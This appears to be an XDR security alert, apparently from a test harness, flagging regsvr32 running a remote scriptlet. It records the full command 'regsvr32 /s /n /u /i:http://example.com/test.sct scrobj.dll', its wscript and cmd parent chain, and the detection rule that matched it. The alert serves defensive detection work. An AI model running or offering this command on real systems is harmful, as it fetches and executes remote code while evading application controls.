HIGH Regsvr32 may have run code from an untrusted source

Detected ID: #3339 | Detected: 2026-01-03 04:06:01 | Execution
Alert Overview

Process action type = execution AND target process cmd = * /i:*http*, * /i*scrobj.dll* AND target process name = regsvr32.exe

Unclassified
XDR BIOC
New
DS:PANW/XDR Agent DOM:Security
Host Information
DESKTOP-FNUMV3U
DESKTOP-FNUMV3U\User
-
Process Information Process Execution
Actor Process (Executor)
Process Name cmd.exe
Path C:\Windows\System32\cmd.exe
PID 25940
SHA256 badf4752413cb0cbdc03fb95820ca167f0cdc63b597ccdb5ef43111180e088b0 VT
MD5 2b40c98ed0f7a1d3b091a3e8353132dc
Signature Microsoft Corporation Signed
C:\WINDOWS\system32\cmd.exe /c "regsvr32 /s /n /u /i:http://example.com/test.sct scrobj.dll"
Action Process (Target)
Process Name regsvr32.exe
SHA256 022cb167a29a32dae848be91aef721c74f1975af151807dafcc5ed832db246b7 VT
Signature Microsoft Corporation Signed
regsvr32  /s /n /u /i:http://example.com/test.sct scrobj.dll
Parent Process (Causality)
Process Name wscript.exe
Path C:\Windows\System32\wscript.exe
SHA256 40d9518bf166d1d94b4d60dfe40efb06d2dd92e1ca6d9ab1a4d2b8ccc49da532 VT
MD5 1bc87886c5d8a35a7d6f00c5a4cf2576
"wscript.exe" "C:\app\cortex-xdr-siem-test\xdr_hidden_runner.vbs" --once
Severity Analysis
HIGH

High priority investigation needed

Summary
Events 1
IP Addresses 3
Tags 2
File Artifacts Yes
Network Artifacts No
Registry Artifacts No
Analyst Verdict